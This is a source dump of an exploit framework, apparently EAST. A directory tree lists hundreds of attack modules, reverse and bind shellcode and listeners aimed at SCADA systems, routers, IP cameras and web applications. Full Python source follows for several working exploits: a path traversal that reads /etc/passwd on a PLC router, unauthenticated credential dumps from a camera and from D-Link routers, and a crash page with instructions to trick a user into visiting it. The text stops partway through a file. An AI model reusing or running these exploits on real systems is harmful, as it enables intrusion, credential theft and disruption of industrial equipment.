├── .gitignore ├── 3rdParty ├── ef_armo_pack_demo │ ├── LICENSE.txt │ ├── changelog.txt │ └── exploits │ │ ├── ef_plc_wireless_router_GPN2_4P21-C-CN_afd.py │ │ ├── efa_ATGCLabs_ActiveLN_HQLi.py │ │ ├── efa_ATGCLabs_Freezer_Web_Acceess_HQLi.py │ │ ├── efa_CleverMic_1011S_12_ip_camera_info_disclosure.py │ │ ├── efa_IceHRM_info_disclosure.py │ │ ├── efa_Socomec_RemoteView_PRO_afu_rce.py │ │ ├── efa_acunetix_sbo.py │ │ ├── efa_adobe_coldfusion_2018_rce.py │ │ ├── efa_apache_struts_rce.py │ │ ├── efa_apache_tomcat_fu_rce.py │ │ ├── efa_baidu_netdisk_dos.py │ │ ├── efa_cisco_catalyst_2960_pe.py │ │ ├── efa_cisco_license_manager_server_directory_traversal.py │ │ ├── efa_clinic_office5_db_management.py │ │ ├── efa_delta_mcis_upsentry2012_privilege_escalation.py │ │ ├── efa_dlink_dir8xx_pd.py │ │ ├── efa_drupal_coder_rce.py │ │ ├── efa_ebrigade_erp_4_5_esql.py │ │ ├── efa_ezviz_cs_cv210_ipcamera_management_or_dos.py │ │ ├── efa_ezviz_cs_cv210_ipcamera_snapshot.py │ │ ├── efa_honeywell_hed1pr3_ipcamera_info_disclosure.py │ │ ├── efa_iball_adsl2_router_rr.py │ │ ├── efa_inoerp_privilege_escalation.py │ │ ├── efa_kaspersky_anti_virus_file_server_fd.py │ │ ├── efa_kkmserver_2_1_26_16_dirtav.py │ │ ├── efa_kkmserver_2_1_26_16_dos.py │ │ ├── efa_levelone_wcs_2030_directory_traversal.py │ │ ├── efa_navigate_cms_8.2_ab_rce.py │ │ ├── efa_nelsonit_erp_6_3_1_esql.py │ │ ├── efa_netwave_ip_camera_information_disclosure.py │ │ ├── efa_openclinic_sqli.py │ │ ├── efa_oracle_java_se_xxe.py │ │ ├── efa_orient_ip33_sh14cp_snapshot.py │ │ ├── efa_sonicDICOM_privilege_escalation.py │ │ ├── efa_symantec_messaging_gateway_dt.py │ │ ├── efa_tp_link_tl_wa850re_rr.py │ │ ├── efa_trend_micro_control_manager_fu_rce.py │ │ ├── efa_trend_micro_threat_discovery_appliance_rce.py │ │ ├── efa_trendmicro_control_manager_sqli_rce.py │ │ ├── efa_trendnet_tk_ip101_privilege_escalation.py │ │ ├── efa_typesetter_cms_dir_listing.py │ │ ├── efa_uc_httpd_directory_traversal.py │ │ ├── efa_upsmon_pro_fd.py │ │ ├── efa_vstarcom_ip_camera_info_disclosure.py │ │ ├── efa_weberp_sqli.py │ │ ├── efa_wordpress_events_sqli.py │ │ ├── efa_xnat_info_disclosure.py │ │ ├── efa_zabbix_sqli.py │ │ ├── efs_domoticz_4_9700_bof.py │ │ └── efs_domoticz_4_9700_sqli.py ├── ef_scada_pack_demo │ ├── LICENSE.txt │ ├── changelog.txt │ └── exploits │ │ ├── efa_delta_mcis_upsentry2012_info_disclosure.py │ │ ├── efa_open_source_erp_arbitrary_sql_execution.py │ │ ├── efa_open_source_erp_dir_trav.py │ │ ├── efs_Becknoff_CX9020_Reboot.py │ │ ├── efs_DELTA_IA_Robot_DRAstudio_afd.py │ │ ├── efs_DoMore_Designer_afd.py │ │ ├── efs_Elipse_E3_e3server_remote_stop.py │ │ ├── efs_GP_PRO_EX_WinGP_Runtime_afd.py │ │ ├── efs_IPESOFT_D2000_SCADA_DirTrav.py │ │ ├── efs_OSHMI_remote_shutdown.py │ │ ├── efs_OpenAPC_BeamServer_DoS.py │ │ ├── efs_PASvisu_dos.py │ │ ├── efs_PeakHMI_Webserver_DirTrav.py │ │ ├── efs_SpiderControl_SCADA_Editor_DirTrav.py │ │ ├── efs_advantech_webaccess_8_3_2_dashboard_bsqli.py │ │ ├── efs_advantech_webaccess_8_3_2_dashboardconfig_afd.py │ │ ├── efs_advantech_webaccess_8_3_directory_traversal.py │ │ ├── efs_advantech_webaccess_8_3_file_delete.py │ │ ├── efs_advantech_webaccess_dashboardeditor_afd.py │ │ ├── efs_atvise_3_2_afd.py │ │ ├── efs_atvise_3_2_info_disclosure.py │ │ ├── efs_autobase_netserver_dos.py │ │ ├── efs_cogent_datahub_7_3_x_dos.py │ │ ├── efs_delta_DIAEnergie_info_disclosure.py │ │ ├── efs_eisbaer_scada_directory_traversal2.py │ │ ├── efs_eisbaer_scada_dt.py │ │ ├── efs_esa_automation_crew_webserver_dir_trav.py │ │ ├── efs_indigo_scada_information_disclosure.py │ │ ├── efs_inductive_automation_7_6_4_designer_xxe.py │ │ ├── efs_inductive_automation_ignition_7_5_4_bSQLi.py │ │ ├── efs_inductive_automation_ignition_7_5_4_xxe.py │ │ ├── efs_infrasightlabs_vscopeserver_privilege_escalation.py │ │ ├── efs_kingscada_aeserver_dos.py │ │ ├── efs_laquis_scada_directory_traversal.py │ │ ├── efs_logi_cals_logi_RTS_RTShttpd_DoS.py │ │ ├── efs_logi_cals_logi_RTS_dir_trav.py │ │ ├── efs_loytec_lweb900_server_dir_trav.py │ │ ├── efs_lsis_XP_Manager_DoS.py │ │ ├── efs_lsis_wXP_DoS.py │ │ ├── efs_moxa_mxview_dos.py │ │ ├── efs_promotic_scada_dos.py │ │ ├── efs_quickhmi_directory_traversal.py │ │ ├── efs_rcware_dos.py │ │ ├── efs_reliance_scada_directory_traversal.py │ │ ├── efs_s3scada_remote_stop.py │ │ ├── efs_trihedral_vtscada_dos.py │ │ ├── efs_u_motion_builder_hardcoded_credentials.py │ │ ├── efs_vbase_vokserver_info_disclosure.py │ │ ├── efs_winplc7_webserver_arbitrary_file_disclosure.py │ │ └── efs_wintr_scada_hardcoded_credentials_directory_traversal.py └── readme.txt ├── 3rdPartyTools ├── ShellcodesUtils │ ├── ld.exe │ ├── ld.gold.exe │ ├── ld64.exe │ ├── libwinpthread-1.dll │ ├── nasm.exe │ └── objdump.exe ├── setuptools.zip ├── six.zip └── websocket.zip ├── Documentation └── TD.docx ├── README.md ├── core ├── BruteForcer.py ├── Commands.py ├── DirectoryTraversal.py ├── Modules.py ├── OptionsParser.py ├── PortScannerMT.py ├── ReportGenerator.py ├── ServiceMessagesHandler.py ├── Sploit.py ├── WebHelper.py ├── WebSocketServer.py ├── __init__.py ├── helpers │ ├── __init__.py │ ├── archieve │ │ ├── __init__.py │ │ ├── jar.py │ │ └── zip.py │ └── java │ │ ├── Serialization.py │ │ └── __init__.py └── passwords.txt ├── data ├── CVE-2015-8103 │ ├── serialized_class_loader │ ├── serialized_file_writer │ ├── serialized_jenkins_header │ ├── serialized_payload_footer │ └── serialized_payload_header └── report_templates │ ├── common.html │ └── row_template.html ├── docs ├── css │ └── bootstrap.min.css ├── files │ ├── template.py │ └── vulnserver_bof │ │ ├── vulnserver.jpg │ │ ├── vulnserver2.jpg │ │ └── vulnserver_buffer_overflow.py ├── index.html └── js │ └── bootstrap.min.js ├── exploits ├── blackstratus_logstorm_rce.py ├── cross_os_shellcode_generator.py ├── directory_traversal_scanner.py ├── ef_bitdefender_gravityzone_dt.py ├── ef_cogento_datahub_afd.py ├── ef_cuppacms_afd.py ├── ef_cuppacms_lfi.py ├── ef_e_detective_afd.py ├── ef_easyfile_webserver_sbo.py ├── ef_fhfs_rce.py ├── ef_jboss_java_serialization_rce.py ├── ef_jenkins_java_deserialize_afu.py ├── ef_joomla_gallery_wd_bsqli.py ├── ef_solarwinds_log_and_event_manager_rce.py ├── ef_symantec_pcanywhere_host_rce.py ├── ef_wincc_miniweb_dos.py ├── efa_aastra_6755i_SIP_SP4_dos.py ├── efa_argosoft_mini_mail_server_dos.py ├── efa_autodesk_backburner_manager_dos.py ├── efa_azure_data_expert_ulimate_bof_rce.py ├── efa_blueiris_dos.py ├── efa_boa_web_server_wapopen_fd.py ├── efa_boonex_dolphin_fu_rce.py ├── efa_bozon_rce.py ├── efa_brightsign_digital_signage_fd.py ├── efa_builderengine_fu.py ├── efa_cerberus_ftp_server_dos.py ├── efa_cobub_razor_pe.py ├── efa_conext_combox_dos.py ├── efa_conquest_dicom_server_dos.py ├── efa_dalim_software_es_core_fd.py ├── efa_dasan_networks_gpon_routers_rce.py ├── efa_dirlist_fu.py ├── efa_disk_pulse_enterprise_bof_rce.py ├── efa_disk_savvy_enterprise_bof_rce.py ├── efa_disk_savvy_enterprise_bof_rce_g.py ├── efa_disk_sorter_enterprise_bof_rce.py ├── efa_dup_scout_enterprise_bof_rce.py ├── efa_easy_chat_server_pd.py ├── efa_easycom_for_php_dos.py ├── efa_evostream_media_server_dos.py ├── efa_exim_rce.py ├── efa_exponent_cms_bsqli.py ├── efa_extraputty_tftp_dos.py ├── efa_flir_thermal_camera_fd.py ├── efa_ftpshell_bof_rce.py ├── efa_geuterbruck_g_cam_rce.py ├── efa_home_web_server_rce.py ├── efa_horos_web_portal_dt.py ├── efa_humax_hg100r_cd.py ├── efa_iball_batton_150m_cd.py ├── efa_ibm_websphere_rce.py ├── efa_inoerp_bsqli.py ├── efa_invoiceplane_pr.py ├── efa_joomla3_admin_takeover.py ├── efa_joomla_googlemap_landkarten_sqli.py ├── efa_joomla_jquickcontact_bsqli.py ├── efa_joomla_js_autoz_bsqli.py ├── efa_joomla_js_jobs_bsqli.py ├── efa_joomla_medialibrary_free_bsqli.py ├── efa_joomla_nextgen_editor_bsqli.py ├── efa_joomla_realpin_bsqli.py ├── efa_joomla_saxum_astro_bsqli.py ├── efa_joomla_saxum_numerology_bsqli.py ├── efa_joomla_saxum_picker_bsqli.py ├── efa_joomla_simplecalendar_bsqli.py ├── efa_joomla_squadmanagement_bsqli.py ├── efa_joomla_zh_baidumap_sqli.py ├── efa_joomla_zh_googlemap_sqli.py ├── efa_joomla_zh_yandexmap_sqli.py ├── efa_kodi_fd.py ├── efa_laravel_log_viewer_fd.py ├── efa_lepton_fu.py ├── efa_make_or_brake_sqli.py ├── efa_microsoft_windows_dvd_maker_xxe.py ├── efa_microsoft_windows_media_center_xxe.py ├── efa_microsoft_windows_remote_assistance_xxe.py ├── efa_mobaxterm_fd.py ├── efa_mongoose_web_server_rce.py ├── efa_monstra_cms_fu_rce.py ├── efa_mvpower_dvr_rce.py ├── efa_my_photo_gallery_sqli.py ├── efa_netgear_dgn2200_router_rce.py ├── efa_nuked_klan_cms_fu.py ├── efa_oscommerce_fu_rce.py ├── efa_php_melody_sqli.py ├── efa_pirelli_drg_a115_adsl_router_dns_change.py ├── efa_ravpower_dos.py ├── efa_ravpower_rce.py ├── efa_real_estate_script_fd.py ├── efa_sap_ase_odata_server_dos.py ├── efa_saplpd_dos.py ├── efa_serva_dos.py ├── efa_server_auditor_fd.py ├── efa_solarwinds_kiwi_syslog_dos.py ├── efa_sweetrice_csrf_rce.py ├── efa_sweetrice_fd.py ├── efa_sweetrice_fu.py ├── efa_sync_breeze_enterprise_bof_rce.py ├── efa_sysgauge_bof_rce.py ├── efa_tenda_adsl_modem_d840r_dns_change.py ├── efa_tenda_routers_dns_change.py ├── efa_tiki_wiki_fd.py ├── efa_tor_browser_dos.py ├── efa_trueonline_billion_5200wt_router_rce.py ├── efa_trueonline_zyxel_p660hnt_router_rce.py ├── efa_ulterius_server_fd.py ├── efa_vbulletin_afd.py ├── efa_vtiger_crm_fu_rce.py ├── efa_vx_search_enterprise_bof_rce.py ├── efa_winaxe_ftp_bof_rce.py ├── efa_wordpress_cafesalivation_theme_fd.py ├── efa_wordpress_church_admin_fd.py ├── efa_wordpress_codeart_google_mp3_player_fd.py ├── efa_wordpress_content_timeline_bsqli.py ├── efa_wordpress_dbox_3d_slider_lite_bsqli.py ├── efa_wordpress_delete_all_comments_fu.py ├── efa_wordpress_dtracker_bsqli.py ├── efa_wordpress_duena_theme_fd.py ├── efa_wordpress_email_subscribers_and_newsletters_id.py ├── efa_wordpress_email_users_sqli.py ├── efa_wordpress_endlesshorizon_theme_fd.py ├── efa_wordpress_event_espresso_free_bsqli.py ├── efa_wordpress_formbuilder_sqli.py ├── efa_wordpress_javo_spot_premium_theme_fd.py ├── efa_wordpress_liberator_theme_fd.py ├── efa_wordpress_link_library_sqli.py ├── efa_wordpress_newspro2891_theme_fd.py ├── efa_wordpress_olimometer_bsqli.py ├── efa_wordpress_oxygen_theme_fd.py ├── efa_wordpress_plugin_answer_my_question_sqli.py ├── efa_wordpress_product_catalog_sqli.py ├── efa_wordpress_responsive_image_gallery_sqli.py ├── efa_wordpress_simply_poll_sqli.py ├── efa_wordpress_testimonials_sqli.py ├── efa_wordpress_top_10_bsqli.py ├── efa_wordpress_ultimate_product_catalogue_sqli.py ├── efa_wordpress_vault_fd.py ├── efa_wordpress_wp_jobs_sqli.py ├── efa_xitami_web_server_dos.py ├── efa_xuezhuli_filesharing_fd.py ├── efa_zivif_pr115_204_p_rs_rce.py ├── efs_DirectAdmin_CSRF.py ├── efs_Yokogawa_CENTUM_DoS.py ├── efs_advantech_studio_dt.py ├── efs_centurystar9_scada_dt.py ├── efs_codesys3_afu.py ├── efs_codesys3_files_manipulation.py ├── efs_codesys_webserver_sbo.py ├── efs_daqfactory_dos.py ├── efs_emerson_roclink800_activex_rce.py ├── efs_levistudio_SBO.py ├── efs_promise_webpam.py ├── efs_proxmox_configuration_overwrite.py ├── efs_realwin21c_bof_rce.py ├── efs_searchblox_dt.py ├── efs_spidercontrol_scada_editor_dos.py ├── efs_ucancode_activex_rce.py ├── efs_vijeo_web_gate_dt.py ├── efs_wincc_miniweb_dos.py ├── efs_wincc_miniweb_dt.py ├── efs_winlog_sbo.py ├── efs_yokogawa_centon_bkbdcopyd_bof.py ├── efs_yokogawa_centon_bkhodeq_bof.py ├── elastix_2_x_bsqli.py ├── fake_ftp_server.py ├── ntp_dos.py ├── os_shellcode_generator.py ├── password_hash_finder.py ├── pligg_cms_blind_sqli.py ├── port_scanner.py ├── schoolhoscms_afu.py ├── simple_openssl_heartbleed_scanner.py ├── standalone_listener.py ├── sugarcrm_rest_deserialize_code_exec.py ├── tp_link_td_8151N_DoS.py ├── vBulletin_5_x_blind_sqli.py ├── vBulletin_deserialize_code_exec.py └── wordpress_plugin_cysteme_afd.py ├── help └── README.txt ├── listener ├── __init__.py ├── bind_connector.py └── listener.py ├── logo.png ├── shellcodes ├── Asm.py ├── DotNetShellcode.py ├── Encoders.py ├── JavaShellcode.py ├── PhpShellcode.py ├── PythonShellcode.py ├── README ├── Runshellcode.py ├── ShellUtils.py ├── ShellcodeGenerator.py ├── Shellcodes.py ├── __init__.py ├── data │ ├── java │ │ ├── reverse_tcp │ │ │ └── Payload.class │ │ └── src │ │ │ └── ReverseTCP │ │ │ └── Payload.java │ ├── linux │ │ ├── bind_tcp.bin │ │ ├── reverse_tcp.bin │ │ ├── src │ │ │ ├── bind_tcp.asm │ │ │ └── reverse_tcp.asm │ │ └── x64 │ │ │ ├── bind_tcp.bin │ │ │ ├── reverse_tcp.bin │ │ │ └── src │ │ │ ├── bind_tcp.asm │ │ │ └── reverse_tcp.asm │ └── windows │ │ ├── bind_tcp.bin │ │ ├── reverse_tcp.bin │ │ ├── src │ │ ├── bind_tcp.asm │ │ └── reverse_tcp.asm │ │ └── x64 │ │ ├── bind_tcp.bin │ │ ├── reverse_tcp.bin │ │ └── src │ │ ├── bind_tcp.asm │ │ └── reverse_tcp.asm ├── shellcode.py └── shellcode_payload.py ├── start.py └── ui ├── __init__.py ├── css ├── bootstrap.min.css ├── codemirror.css ├── main.css └── toastr.min.css ├── fonts ├── glyphicons-halflings-regular.eot ├── glyphicons-halflings-regular.svg ├── glyphicons-halflings-regular.ttf ├── glyphicons-halflings-regular.woff └── glyphicons-halflings-regular.woff2 ├── httpd.py ├── icons ├── listener-connected.ico ├── listener-disconnected.ico ├── listener-enabled.ico └── transparent.ico ├── index.html ├── index.jade ├── js ├── bootstrap.min.js ├── codemirror.js ├── components.js ├── guiCommands.js ├── jquery.min.js ├── lodash.min.js ├── main.js ├── rsvp.js ├── serverCommands.js ├── toastr.min.js ├── vue.min.js └── ws.js └── mode └── python ├── index.html └── python.js /.gitignore: -------------------------------------------------------------------------------- 1 | *.pyc 2 | Reports/ 3 | Logs/ 4 | /.idea 5 | /tmp/Webserver20160906100204 6 | /OUTPUTS 7 | /tmp 8 | exploits 9 | -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/LICENSE.txt: -------------------------------------------------------------------------------- 1 | https://www.gnu.org/licenses/gpl-3.0.txt -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/changelog.txt: -------------------------------------------------------------------------------- 1 | 2 | 1.0 3 | September 18, 2022 4 | 5 | efa_acunetix_sbo.py 6 | efa_adobe_coldfusion_2018_rce.py 7 | efa_apache_struts_rce.py 8 | efa_apache_tomcat_fu_rce.py 9 | efa_ATGCLabs_ActiveLN_HQLi.py 10 | efa_ATGCLabs_Freezer_Web_Acceess_HQLi.py 11 | efa_baidu_netdisk_dos.py 12 | efa_cisco_catalyst_2960_pe.py 13 | efa_cisco_license_manager_server_directory_traversal.py 14 | efa_CleverMic_1011S_12_ip_camera_info_disclosure.py 15 | efa_clinic_office5_db_management.py 16 | efa_delta_mcis_upsentry2012_privilege_escalation.py 17 | efa_dlink_dir8xx_pd.py 18 | efa_drupal_coder_rce.py 19 | efa_ebrigade_erp_4_5_esql.py 20 | efa_ezviz_cs_cv210_ipcamera_management_or_dos.py 21 | efa_ezviz_cs_cv210_ipcamera_snapshot.py 22 | efa_honeywell_hed1pr3_ipcamera_info_disclosure.py 23 | efa_iball_adsl2_router_rr.py 24 | efa_IceHRM_info_disclosure.py 25 | efa_inoerp_privilege_escalation.py 26 | efa_kaspersky_anti_virus_file_server_fd.py 27 | efa_kkmserver_2_1_26_16_dirtav.py 28 | efa_kkmserver_2_1_26_16_dos.py 29 | efa_levelone_wcs_2030_directory_traversal.py 30 | efa_navigate_cms_8.2_ab_rce.py 31 | efa_nelsonit_erp_6_3_1_esql.py 32 | efa_netwave_ip_camera_information_disclosure.py 33 | efa_openclinic_sqli.py 34 | efa_oracle_java_se_xxe.py 35 | efa_orient_ip33_sh14cp_snapshot.py 36 | efa_Socomec_RemoteView_PRO_afu_rce.py 37 | efa_sonicDICOM_privilege_escalation.py 38 | efa_symantec_messaging_gateway_dt.py 39 | efa_tp_link_tl_wa850re_rr.py 40 | efa_trendmicro_control_manager_sqli_rce.py 41 | efa_trendnet_tk_ip101_privilege_escalation.py 42 | efa_trend_micro_control_manager_fu_rce.py 43 | efa_trend_micro_threat_discovery_appliance_rce.py 44 | efa_typesetter_cms_dir_listing.py 45 | efa_uc_httpd_directory_traversal.py 46 | efa_upsmon_pro_fd.py 47 | efa_vstarcom_ip_camera_info_disclosure.py 48 | efa_weberp_sqli.py 49 | efa_wordpress_events_sqli.py 50 | efa_xnat_info_disclosure.py 51 | efa_zabbix_sqli.py 52 | efs_domoticz_4_9700_bof.py 53 | efs_domoticz_4_9700_sqli.py 54 | ef_plc_wireless_router_GPN2_4P21-C-CN_afd.py -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/exploits/ef_plc_wireless_router_GPN2_4P21-C-CN_afd.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import os 7 | import urllib2 8 | 9 | sys.path.append("./core") 10 | from Sploit import Sploit 11 | 12 | INFO = {} 13 | INFO['NAME'] = "ef_plc_wireless_router_GPN2.4P21-C-CN_afd" 14 | INFO['DESCRIPTION'] = "PLC Wireless Router GPN2.4P21-C-CN Arbitrary File Disclosure" 15 | INFO['VENDOR'] = "" 16 | INFO['DOWNLOAD_LINK'] = '' 17 | INFO['LINKS'] = ['https://www.exploit-db.com/exploits/40304/'] 18 | INFO["CVE Name"] = "0-day" 19 | INFO["NOTES"] = """PLC Wireless Router GPN2.4P21-C-CN Arbitrary File Disclosure. For example this module get /etc/password from router 20 | """ 21 | 22 | INFO['CHANGELOG'] = "30 Aug, 2016. Written by Gleg team." 23 | INFO['PATH'] = 'Exploits/Hardware/' 24 | 25 | # Must be in every module, to be set by framework 26 | OPTIONS = {} 27 | OPTIONS["HOST"] = '192.168.1.123' 28 | OPTIONS["PORT"] = 8080 29 | 30 | class exploit(Sploit): 31 | def __init__(self, host = "", port = 0, logger = None): 32 | Sploit.__init__(self, logger = logger) 33 | self.name = INFO['NAME'] 34 | self.port = port 35 | self.host = host 36 | 37 | def args(self): 38 | self.args = Sploit.args(self, OPTIONS) 39 | self.host = self.args.get('HOST', self.host) 40 | self.port = int(self.args.get('PORT', self.port)) 41 | 42 | def make_url(self, path = ''): 43 | return 'http://{}:{}{}'.format(self.host, self.port, path) 44 | 45 | def run(self): 46 | self.args() 47 | self.log("Attacking {}".format(self.host)) 48 | 49 | url = self.make_url('/cgi-bin/webproc?getpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:retag=1&var:subpage=-') 50 | url2 = self.make_url('/cgi-bin/webproc?getpage=../../../etc/passwd&var:menu=setup&var:page=connected') 51 | try: 52 | fd = urllib2.urlopen(url) 53 | cookie = fd.headers['set-cookie'] 54 | self.log('Cookie ' + cookie) 55 | 56 | request = urllib2.Request(url2) 57 | request.add_header('Cookie', cookie) 58 | fd = urllib2.urlopen(request) 59 | data = '\n' + fd.read() 60 | 61 | self.log(data) 62 | 63 | except Exception as ex: 64 | self.log(ex) 65 | self.finish(False) 66 | 67 | self.finish(True) 68 | if __name__ == '__main__': 69 | """ 70 | By now we only have the tool mode for exploit.. 71 | Later we would have standalone mode also. 72 | """ 73 | 74 | print "Running exploit %s .. " % INFO['NAME'] 75 | e = exploit('', 80) 76 | e.run() 77 | -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/exploits/efa_CleverMic_1011S_12_ip_camera_info_disclosure.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | import pprint 5 | from collections import OrderedDict 6 | from Sploit import Sploit 7 | 8 | INFO = {} 9 | INFO['NAME'] = "efa_CleverMic_1011S_12_ip_camera_info_disclosure" 10 | INFO['DESCRIPTION'] = "CleverMic 1011S-12 IP Camera Info Disclosure" 11 | INFO['VENDOR'] = "https://unitsolutions.ru/ptz-camera/1227-ptz-kamera-clevermic-1011s-12.html" 12 | INFO["CVE Name"] = "0day" 13 | INFO["DOWNLOAD_LINK"] = "" 14 | INFO["LINKS"] = [] 15 | INFO['CHANGELOG'] = "21 Dec, 2017" 16 | INFO['PATH'] = "General/" 17 | INFO["NOTES"] = """ 18 | Unauthorized attacker can obtain users credentials. 19 | Tested against firmware V2.4.3 2017-7-17. 20 | """ 21 | 22 | # Must be in every module, to be set by framework 23 | OPTIONS = OrderedDict() 24 | OPTIONS["HOST"] = "192.168.1.13" 25 | OPTIONS["PORT"] = 80 26 | 27 | 28 | class exploit(Sploit): 29 | def __init__(self,host="", 30 | port=0, ssl=False, 31 | logger=None): 32 | Sploit.__init__(self, logger=logger) 33 | 34 | def args(self): 35 | self.args = Sploit.args(self, OPTIONS) 36 | self.host = self.args.get("HOST", OPTIONS["HOST"]) 37 | self.port = self.args.get("PORT", OPTIONS["PORT"]) 38 | 39 | def make_url(self, path=''): 40 | url = 'http://{}:{}/{}'.format(self.host, self.port, path) 41 | return url 42 | 43 | def run(self): 44 | #Get options from gui 45 | self.args() 46 | self.log("[*] Trying to connect to {}".format(self.make_url())) 47 | url = self.make_url('ajaxcom?szCmd={"GetEnv":{"SysUser":{}}}') 48 | res = urllib2.urlopen(url).read() 49 | self.log('[+]\r\n' + res) 50 | self.finish(True) 51 | 52 | 53 | if __name__ == '__main__': 54 | """ 55 | By now we only have the tool 56 | mode for exploit.. 57 | Later we would have 58 | standalone mode also. 59 | """ 60 | print "Running exploit %s .. " % INFO['NAME'] 61 | e = exploit("192.168.0.1",80) 62 | e.run() 63 | -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/exploits/efa_baidu_netdisk_dos.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import os 7 | import time 8 | 9 | sys.path.append("./core") 10 | from Sploit import Sploit 11 | from WebHelper import SimpleWebServer 12 | 13 | INFO = {} 14 | INFO['NAME'] = "efa_baidu_netdisk_dos" 15 | INFO['DESCRIPTION'] = "Baidu NetDisk - Denial Of Service" 16 | INFO['VENDOR'] = "https://pan.baidu.com/" 17 | INFO['DOWNLOAD_LINK'] = '' 18 | INFO['LINKS'] = '' 19 | INFO["CVE Name"] = "0-day" 20 | INFO["NOTES"] = """Baidu NetDisk crashed if user visit special crafted web page 21 | """ 22 | 23 | INFO['CHANGELOG'] = "13 Sep, 2017. Written by Gleg team." 24 | INFO['PATH'] = 'Exploits/Dos/' 25 | 26 | # Must be in every module, to be set by framework 27 | OPTIONS = {} 28 | OPTIONS['HOST'] = '127.0.0.1', dict(description = 'Your IP') 29 | OPTIONS["PORT"] = 8080, dict(description = 'Your port for web server') 30 | 31 | class exploit(Sploit): 32 | def __init__(self, host = "", port = 0, logger = None): 33 | Sploit.__init__(self, logger = logger) 34 | self.name = INFO['NAME'] 35 | self.port = port 36 | self.host = host 37 | 38 | def args(self): 39 | self.args = Sploit.args(self, OPTIONS) 40 | self.port = int(self.args.get('PORT', self.port)) 41 | self.host = self.args.get('HOST', self.host) 42 | 43 | def run(self): 44 | self.args() 45 | self.log("Serve on {}".format(self.host)) 46 | 47 | html = '' 48 | 49 | server = SimpleWebServer(self.host, self.port) 50 | server.add_file_for_share("index.html", html) 51 | server.start_serve() 52 | 53 | self.log('Ok. Now trick user who runs baidu netdisk visit your address http://{}:{}/index.html'.format(self.host, self.port)) 54 | self.log('Wait connection for 120s') 55 | time.sleep(120) 56 | 57 | server.stop_serve() 58 | self.log('Server stopped. If user visited your page his netdisk crashed') 59 | self.log('Done') 60 | self.finish(True) 61 | 62 | if __name__ == '__main__': 63 | """ 64 | By now we only have the tool mode for exploit.. 65 | Later we would have standalone mode also. 66 | """ 67 | 68 | print "Running exploit %s .. " % INFO['NAME'] 69 | e = exploit('', 80) 70 | e.run() 71 | -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/exploits/efa_dlink_dir8xx_pd.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # -*- coding: utf_8 -*- 3 | # The exploit is a part of EAST Framework - use only under the license agreement specified in LICENSE.txt in your EAST Framework distribution 4 | 5 | import sys 6 | import os 7 | import urllib2 8 | import time 9 | 10 | sys.path.append("./core") 11 | from Sploit import Sploit 12 | 13 | INFO = {} 14 | INFO['NAME'] = "efa_dlink_dir8xx_pd" 15 | INFO['DESCRIPTION'] = "D-Link DIR8xx routers - credential disclosure vulnerability." 16 | INFO['VENDOR'] = "http://www.dlink.ru/" 17 | INFO['DOWNLOAD_LINK'] = '' 18 | INFO['LINKS'] = ['https://embedi.com/blog/enlarge-your-botnet-top-d-link-routers-dir8xx-d-link-routers-cruisin-bruisin'] 19 | INFO["CVE Name"] = "" 20 | INFO["NOTES"] = """ 21 | - DIR885L 22 | - DIR890L 23 | - DIR895L 24 | - and others. 25 | phpcgi is responsible for processing requests to .php, .asp and .txt pages. Also, it checks whether a user is authorized or not. Nevertheless, if a request is crafted in a proper way, an attacker can easily bypass authorization and execute a script that returns a login and password to a router. 26 | """ 27 | 28 | INFO['CHANGELOG'] = "19 Sep, 2017. Written by Gleg team." 29 | INFO['PATH'] = 'Exploits/Hardware/' 30 | 31 | # Must be in every module, to be set by framework 32 | OPTIONS = {} 33 | OPTIONS['HOST'] = '127.0.0.1', dict(description = 'Target IP') 34 | OPTIONS["PORT"] = 80 35 | 36 | class exploit(Sploit): 37 | def __init__(self, host = "", port = 0, logger = None): 38 | Sploit.__init__(self, logger = logger) 39 | self.name = INFO['NAME'] 40 | self.port = port 41 | self.host = host 42 | 43 | def args(self): 44 | self.args = Sploit.args(self, OPTIONS) 45 | self.port = int(self.args.get('PORT', self.port)) 46 | self.host = self.args.get('HOST', self.host) 47 | 48 | def make_url(self, path = ''): 49 | return 'http://{}:{}{}'.format(self.host, self.port, path) 50 | 51 | def run(self): 52 | self.args() 53 | self.log("Attacking {}".format(self.host)) 54 | 55 | url = self.make_url('/getcfg.php') 56 | data = 'A=A%0a_POST_SERVICES%3dDEVICE.ACCOUNT%0aAUTHORIZED_GROUP%3d1' 57 | request = urllib2.Request(url, data) 58 | try: 59 | fd = urllib2.urlopen(request) 60 | result = fd.read() 61 | self.log(result) 62 | except Exception as e: 63 | self.log(e) 64 | self.finish(False) 65 | self.finish(True) 66 | 67 | if __name__ == '__main__': 68 | """ 69 | By now we only have the tool mode for exploit.. 70 | Later we would have standalone mode also. 71 | """ 72 | 73 | print "Running exploit %s .. " % INFO['NAME'] 74 | e = exploit('', 80) 75 | e.run() 76 | -------------------------------------------------------------------------------- /3rdParty/ef_armo_pack_demo/exploits/efa_ezviz_cs_cv210_ipcamera_snapshot.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import urllib2 4 | from collections import OrderedDict 5 | 6 | from Sploit import Sploit 7 | 8 | INFO = {} 9 | INFO['NAME'] = "efa_ezviz_cs_cv210_ipcamera_snapshot" 10 | INFO['DESCRIPTION'] = "Hikvision Ezviz CS-CV210(C3s) Snapshot" 11 | INFO['VENDOR'] = "http://www.ezvizlife.com/" 12 | INFO["CVE Name"] = "0day" 13 | INFO["NOTES"] = """ 14 | Remote attaker can make snapshot. Authorization is not required. 15 | Tested against Ezviz CS-CV210 firmware v5.2.7. 16 | """ 17 | INFO["DOWNLOAD_LINK"] = "" 18 